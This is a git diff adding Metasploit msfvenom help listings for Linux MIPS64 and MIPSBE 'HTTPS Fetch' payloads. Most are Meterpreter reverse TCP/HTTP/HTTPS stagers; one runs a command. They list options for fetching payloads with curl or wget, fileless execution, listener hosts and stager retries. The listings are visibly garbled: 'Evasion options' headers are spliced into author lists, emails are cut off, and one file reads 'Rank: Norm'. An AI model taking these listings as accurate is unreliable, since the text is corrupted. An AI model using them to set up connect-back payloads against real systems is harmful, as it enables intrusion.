SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..7564c08 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_https.txt 
@@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mips64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/https/mips64/meterpreter_reverse_https: +========================= + +rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME LYGkIKKpd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPS64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload 
UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..df59f94 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mips64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/mips64/meterpreter_reverse_tcp: +========================= + +ook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ATidwOWU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPS64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + 
MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-exec.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-exec.txt new file mode 100644 index 0000000..0bad6a6 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-exec.txt 
@@ -0,0 +1,74 @@ + + Name: HTTPS Fetch, Linux Execute Command + Module: payload/cmd/linux/https/mipsbe/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + entropy + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ucxPMdIJiG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + + A very small shellcode for executing commands. + This module is sometimes helpful for testing purposes. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..d330e58 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter-reverse_tcp.txt 
@@ -0,0 +1,105 @@ + + Name: HTTPS Fetch, Reverse TCP Stager + Module: payload/cmd/linux/https/mipsbe/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Norm +Evasion options for payload/cmd/linux/https/mipsbe/meterpreter/reverse_tcp: +========================= + + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME kTkHzsICcJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID 
value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_http.txt new file mode 100644 index 0000000..cd920b8 
--- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_http.txt 
@@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mipsbe/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/mipsbe/meterpreter_reverse_http: +========================= + +k@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME gIHyrdPWyj no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload 
UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_https.txt new file mode 100644 index 0000000..7f3bdff --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_https.txt 
@@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mipsbe/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/https/mipsbe/meterpreter_reverse_https: +========================= + +rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uduPCcLgXJQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + 